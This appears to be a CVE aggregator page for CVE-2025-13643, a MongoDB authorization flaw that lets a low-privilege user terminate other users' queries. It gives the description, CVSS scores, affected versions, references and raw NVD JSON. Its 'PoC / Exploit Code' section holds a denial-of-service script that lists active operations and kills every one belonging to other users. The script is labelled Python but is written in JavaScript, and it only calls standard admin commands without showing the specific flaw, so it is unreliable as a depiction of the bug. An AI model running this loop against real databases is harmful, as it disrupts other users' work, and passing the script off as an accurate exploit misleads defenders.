CVE-2025-13643

Description

A user with access to the cluster with a limited set of privilege actions may be able to terminate queries that are being executed by other users. This may cause a denial of service by preventing a fraction of queries from successfully completing. This issue affects MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB Server v8.0 versions prior to 8.0.14

CVSS Details

CVSS Score

3.1

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mongodb:mongodb:8.2.0:alpha:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mongodb:mongodb:8.2.0:alpha0:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mongodb:mongodb:8.2.0:alpha1:*:*:-:*:*:* - VULNERABLE

MongoDB Server v7.0 < 7.0.26

MongoDB Server v8.0 < 8.0.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-13643 PoC - MongoDB Query Termination Vulnerability
// Requires low-privilege user with cluster access

const { MongoClient } = require('mongodb');

async function exploitCVE202513643() {
    const targetHost = 'mongodb://target-server:27017';
    const attackerCredentials = {
        user: 'limited_user',
        password: 'low_privilege_pass'
    };
    
    const client = new MongoClient(targetHost, {
        auth: attackerCredentials,
        authSource: 'admin'
    });
    
    try {
        await client.connect();
        const adminDb = client.db('admin');
        
        // Step 1: Identify active queries from other users
        const activeOperations = await adminDb.adminCommand({
            currentOp: 1,
            $all: false
        });
        
        console.log('Active operations found:', activeOperations.inprog.length);
        
        // Step 2: Terminate queries from other users
        for (const op of activeOperations.inprog) {
            if (op.usr !== attackerCredentials.user && op.opid) {
                console.log(`Terminating operation ${op.opid} from user ${op.usr}`);
                
                await adminDb.adminCommand({
                    killOp: 1,
                    op: op.opid
                });
                
                console.log(`Successfully terminated query: ${op.opid}`);
            }
        }
        
        console.log('CVE-2025-13643 exploitation completed');
        
    } catch (error) {
        console.error('Exploitation failed:', error.message);
    } finally {
        await client.close();
    }
}

exploitCVE202513643();

// Defense: Upgrade to MongoDB Server v7.0.26+ or v8.0.14+

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13643
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13643
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13643/
[4] VulDB https://vuldb.com/cve/CVE-2025-13643
[5] https://jira.mongodb.org/browse/SERVER-103582

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13643", "sourceIdentifier": "[email protected]", "published": "2025-11-25T06:15:45.580", "lastModified": "2025-12-11T23:20:36.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A user with access to the cluster with a limited set of privilege actions may be able to terminate queries that are being executed by other users. This may cause a denial of service by preventing a fraction of queries from successfully completing. This issue affects MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB Server v8.0 versions prior to 8.0.14"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.26", "matchCriteriaId": "8788DEE3-96FD-4F62-BE22-EB3F9C4DD73F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.14", "matchCriteriaId": "DB40CA6D-51A5-4D61-979F-E71C50C96B65"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha:*:*:-:*:*:*", "matchCriteriaId": "5BF4D317-BC85-4BA9-9D64-91F14C4398F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha0:*:*:-:*:*:*", "matchCriteriaId": "64806572-E654-4691-90A6-C978BAD30263"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha1:*:*:-:*:*:*", "matchCriteriaId": "870C35A8-B7C5-4CC0-A8D6-D39DE370EEA9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha2:*:*:-:*:*:*", "matchCriteriaId": "FCFCFC59-331F-47E1-9EA4-A0CA3D9F7989"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-103582", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}